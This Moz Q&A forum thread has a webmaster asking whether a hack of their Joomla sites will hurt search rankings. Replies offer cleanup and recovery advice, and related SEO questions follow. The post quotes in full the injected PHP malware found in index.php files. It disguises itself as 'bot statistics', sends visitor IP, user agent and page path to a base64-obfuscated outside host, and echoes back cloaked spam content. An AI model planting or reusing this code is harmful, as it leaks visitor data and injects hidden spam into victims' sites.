Website has been hacked will this hurt ranking
-
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings.
My first question : Will this hurt my rankings ?
Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this.
Grtz,
Ard
-
I'm using joomla sites. I now know how they got into our sites. We had malware on one of the computers, and apparantly keeps filezilla the passwords in a text files without encryption. I have changed all the comprimised files back, and changed every password on the sites. The hack changed every index and footer file. Let's hope it doesn't came back.
-
If you are using wordpress, I would be inclined to reinstall the base files, or restore from a backup to a time prior to the hack (if you have not made many changes since).
I would also recommend the wordpress security plugin, change all passwords to strong ones etc.
Don't just fix the problem, but secure your site against it happening again as well.
-
Hi Jonathan,
Luckily I haven't seen any changes in rankings in the last weeks. Let hope it stays this way.
I did find files that were changed on the 10 of September.
Google hasn't identified my site as being hacked.
Is there anything else I can do?
-
I have read elsewhere that it impacts what search engines see, so will insert backlinks to other sites which only show to the crawlers. You, or anyone else visiting the site would not notice anything different. Its a very sneaky hack.
This would potentially affect your site rankings. Apart from PR leakage, if they are linking to bad domains etc Google might not look kindly on it.
Just remove the offending code \ hack, and things should slowly get back to normal though as your site is recrawled. Have you noticed a change in your rankings? If you sort it quickly, I doubt you will need to do anything, but remove the hack.
Has Google identified your site as being hacked? If they have follow these steps including request they review the site at the end: http://www.google.com/webmasters/hacked/
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
A Sitemap Web page & A Sitemap in htaccess - will a website be penalised for having both?
Hi I have a sitemap url already generated by SEO Yoast in the htaccess file, and I have submitted that to the search engines. I'd already created a sitemap web page on the website, also as a helpful aid for users to see a list of all page urls. Is this a problem and could this scenario create duplicate issues or any problems with search engines? Thanks.
White Hat / Black Hat SEO | | SEOguy10 -
Dfferent domains on same ip address ranking for the same keywords, is it possible?
Hello, I want to ask if two domains which r hosted on the same server and have the same ip ( usually happens with shared hosts ) tries to rank for the same keywords in google, does the same ip affects them or not.
White Hat / Black Hat SEO | | RizwanAkbar0 -
Keywords Ranking Fluctuate
Hi Moz Community! I've been working with a client’s website for about a year now. They were hit with the original Panda/ Penguin update because of some spammy links. We have analysed and disavow sapmmy links edit anchor tag and landing pages. We've made a decent climb back while working on it keywords ranking was improved some of them are from out of 500 to top 30, but not a full recovery. There are some weird things happening that I would love some insight into. 1. Ranking for keywords are again dropping and traffic is gone: I notice keyword ranking is dropping and some of the keywords which are on 2 and 3 page, now on 9<sup>th</sup> page. And also traffic is down. Any help would be appreciated! Regards, S
White Hat / Black Hat SEO | | ShaunPhilips0 -
Is there a danger linking to and from one website too many times?
Basically my webdeveloper has suggested that instead of using a subfolder to create an English and Korean version of the site I should create two different websites and then link them both together to provide the page in English, or in Korean, which ever the case may be. My immediate reaction is that search engines may perceive this kind of linking to be manipulative, as you can imagine there will be a lot of links (One for every page). Do you think it is OK to create two webpages and link them together page by page? Or do you think that the site will get penalized by search engines for link farming or link exchanging. Regards, Tom
White Hat / Black Hat SEO | | CoGri0 -
Website mallware attacks
I keep getting attacks to my website every time that are being blocked by OSE firewall Is there any way to stop this? I am affraid because they actually manage enter my website on the past, and i dont know if they can enter on the future or if having all the pluggins and wordpress updated. I am safe enough, and i am not sure if there is any type of virus on my computer Macbook as those attacked pages were recently updated from my computer. Is there any malware scan for Mac Thanl you == Attack Details == TYPE: Found Basic DoS Attacks DETECTED ATTACK VALUE: dDos Attack ACTION: Blocked LOGTIME: 2013-02-25 11:48:18 FROM IP: http://whois.domaintools.com/75.126.24.81 URI: [http://www.propdental.es/](http://www.propdental.es/) METHOD: HEAD USERAGENT: N/A REFERRER: N/A == Attack Details == TYPE: Found Basic DoS Attacks DETECTED ATTACK VALUE: dDos Attack ACTION: Blocked LOGTIME: 2013-02-25 10:13:17 FROM IP: http://whois.domaintools.com/107.21.150.82 URI: [http://www.propdental.es/blanqueamiento-dental/](http://www.propdental.es/blanqueamiento-dental/) METHOD: HEAD USERAGENT: N/A REFERRER: N/A ``` == Attack Details == TYPE: Found Malicious User Agent DETECTED ATTACK VALUE: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 ACTION: Blocked LOGTIME: 2013-02-25 03:13:52 FROM IP: http://whois.domaintools.com/119.245.226.74 URI: [http://www.propdental.es/sonrisas/los-martinez/](http://www.propdental.es/sonrisas/los-martinez/) METHOD: HEAD USERAGENT: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 REFERRER: N/A ``` ```
White Hat / Black Hat SEO | | maestrosonrisas0 -
If Google Authorship is used for every page of your website, will it be penalized?
Hey all, I've noticed a lot of companies will implement Google Authorship on all pages of their website, ie landing pages, home pages, sub pages. I'm wondering if this will be penalized as it isn't a typical authored piece of content, like blogs, articles, press releases etc. I'm curious as I'm going to setup Google Authorship and I don't want it to be setup incorrectly for the future. Is it okay to tie each page (home page, sub pages) and not just actual authored content (blogs, articles, press releases) or will it get penalized if that occurs? Thanks and much appreciated!
White Hat / Black Hat SEO | | MonsterWeb280 -
Big Rank Drop - Is My Site Spammy?
Like many others one of our niche sites - aluminumeyewear.com got slammed in the recent algo updates (4/18). All of our pages dropped at least 40/50 places which seems like a penalty to me. The site still ranks for its name thankfully. I'm trying to figure out if this is an over-optimization penalty, or a devaluing of back links or both. I would be grateful if I could get some feedback as to whether you feel the site is over optimized and how I could check if sources of back links have been penalized which in turn has effected us? Thanks in advance!
White Hat / Black Hat SEO | | smckenzie750